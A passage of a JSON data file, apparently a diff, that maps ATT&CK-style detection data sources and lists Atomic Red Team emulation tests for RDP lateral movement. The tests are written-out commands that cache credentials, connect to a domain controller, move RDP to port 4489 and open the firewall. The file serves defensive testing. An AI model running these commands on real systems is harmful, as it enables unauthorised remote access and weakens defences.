This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + } + ], + "external_reference": [ + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1021.001", + "command_list": [ + "$Server=$ENV:logonserver.TrimStart(\"\\\")\n$User = Join-Path #{domain} #{username}\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "$Server=#{logonserver}\n$User = Join-Path $Env:USERDOMAIN #{username}\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "$Server=#{logonserver}\n$User = Join-Path #{domain} $ENV:USERNAME\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server 
/user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "$Server=#{logonserver}\n$User = Join-Path #{domain} #{username}\n$Password=\"1password2!\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "$Server=\"WIN-DC\"\n$User=\"#{username}\"\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "$Server=\"#{logonserver}\"\n$User=\"Administrator\"\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "$Server=\"#{logonserver}\"\n$User=\"#{username}\"\n$Password=\"1password2!\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "Set-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp' -name \"PortNumber\" -Value #{NEW_Remote_Port}\nNew-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort #{NEW_Remote_Port}\n", + "Set-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp' -name \"PortNumber\" -Value 4489\nNew-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort 4489\n", + "reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} -f\nnetsh advfirewall firewall add rule name=\"RDPPORTLatest-TCP-In\" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}\n", + "reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d 4489 -f\nnetsh advfirewall firewall add rule name=\"RDPPORTLatest-TCP-In\" dir=in action=allow 
protocol=TCP localport=4489\n" + ], + "commands": [ + { + "command": "$Server=$ENV:logonserver.TrimStart(\"\\\")\n$User = Join-Path #{domain} #{username}\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + }, + { + "command": "$Server=#{logonserver}\n$User = Join-Path $Env:USERDOMAIN #{username}\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + }, + { + "command": "$Server=#{logonserver}\n$User = Join-Path #{domain} $ENV:USERNAME\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + }, + { + "command": "$Server=#{logonserver}\n$User = Join-Path #{domain} #{username}\n$Password=\"1password2!\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + }, + { + "command": "$Server=\"WIN-DC\"\n$User=\"#{username}\"\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + }, + { + "command": "$Server=\"#{logonserver}\"\n$User=\"Administrator\"\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User 
/pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + }, + { + "command": "$Server=\"#{logonserver}\"\n$User=\"#{username}\"\n$Password=\"1password2!\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + }, + { + "command": "Set-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp' -name \"PortNumber\" -Value #{NEW_Remote_Port}\nNew-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort #{NEW_Remote_Port}\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + }, + { + "command": "Set-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp' -name \"PortNumber\" -Value 4489\nNew-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort 4489\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + }, + { + "command": "reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} -f\nnetsh advfirewall firewall add rule name=\"RDPPORTLatest-TCP-In\" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + }, + { + "command": "reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d 
4489 -f\nnetsh advfirewall firewall add rule name=\"RDPPORTLatest-TCP-In\" dir=in action=allow protocol=TCP localport=4489\n", + "source": "atomics/T1021.001/T1021.001.yaml", + "name": "Atomic Red Team Test - Remote Services: Remote Desktop Protocol" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1021.001", + "display_name": "Remote Services: Remote Desktop Protocol", + "atomic_tests": [ + { + "name": "RDP to DomainController", + "auto_generated_guid": "355d4632-8cb9-449d-91ce-b566d0253d3e", + "description": "Attempt an RDP session via Remote Desktop Application to a DomainController.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "logonserver": { + "description": "ComputerName argument default %logonserver%", + "type": "String", + "default": "$ENV:logonserver.TrimStart(\"\\\")" + }, + "domain": { + "description": "domain argument default %USERDOMAIN%", + "type": "String", + "default": "$Env:USERDOMAIN" + }, + "username": { + "description": "Username argument default %username%", + "type": "String", + "default": "$ENV:USERNAME" + }, + "password": { + "description": "Password", + "type": "String", + "default": "1password2!" 
+ } + }, + "dependencies": [ + { + "description": "Computer must be domain joined\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually\n" + } + ], + "executor": { + "command": "$Server=#{logonserver}\n$User = Join-Path #{domain} #{username}\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "cleanup_command": "$p=Tasklist /svc /fi \"IMAGENAME eq mstsc.exe\" /fo csv | convertfrom-csv\nif(-not ([string]::IsNullOrEmpty($p.PID))) { Stop-Process -Id $p.PID }\n", + "name": "powershell" + } + }, + { + "name": "RDP to Server", + "auto_generated_guid": "7382a43e-f19c-46be-8f09-5c63af7d3e2b", + "description": "Attempt an RDP session via Remote Desktop Application over Powershell\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "logonserver": { + "description": "ComputerName", + "type": "String", + "default": "WIN-DC" + }, + "username": { + "description": "Username", + "type": "String", + "default": "Administrator" + }, + "password": { + "description": "Password", + "type": "String", + "default": "1password2!" 
+ } + }, + "executor": { + "command": "$Server=\"#{logonserver}\"\n$User=\"#{username}\"\n$Password=\"#{password}\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", + "cleanup_command": "$p=Tasklist /svc /fi \"IMAGENAME eq mstsc.exe\" /fo csv | convertfrom-csv\nif(-not ([string]::IsNullOrEmpty($p.PID))) { Stop-Process -Id $p.PID }\n", + "name": "powershell" + } + }, + { + "name": "Changing RDP Port to Non Standard Port via Powershell", + "auto_generated_guid": "2f840dd4-8a2e-4f44-beb3-6b2399ea3771", + "description": "Changing RDP Port to Non Standard Port via Remote Desktop Application over Powershell\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "OLD_Remote_Port": { + "description": "Default RDP Listening Port", + "type": "String", + "default": "3389" + }, + "NEW_Remote_Port": { + "description": "New RDP Listening Port", + "type": "String", + "default": "4489" + } + }, + "executor": { + "command": "Set-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp' -name \"PortNumber\" -Value #{NEW_Remote_Port}\nNew-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort #{NEW_Remote_Port}\n", + "cleanup_command": "Set-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp' -name \"PortNumber\" -Value #{OLD_Remote_Port}\nRemove-NetFirewallRule -DisplayName \"RDPPORTLatest-TCP-In\" -ErrorAction ignore \n", + "name": "powershell" + } + }, + { + "name": "Changing RDP Port to Non Standard Port via Command_Prompt", + "auto_generated_guid": "74ace21e-a31c-4f7d-b540-53e4eb6d1f73", + "description": "Changing RDP Port to Non Standard Port via Command_Prompt\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "OLD_Remote_Port": { + "description": "Default RDP Listening Port", + "type": "String", + 
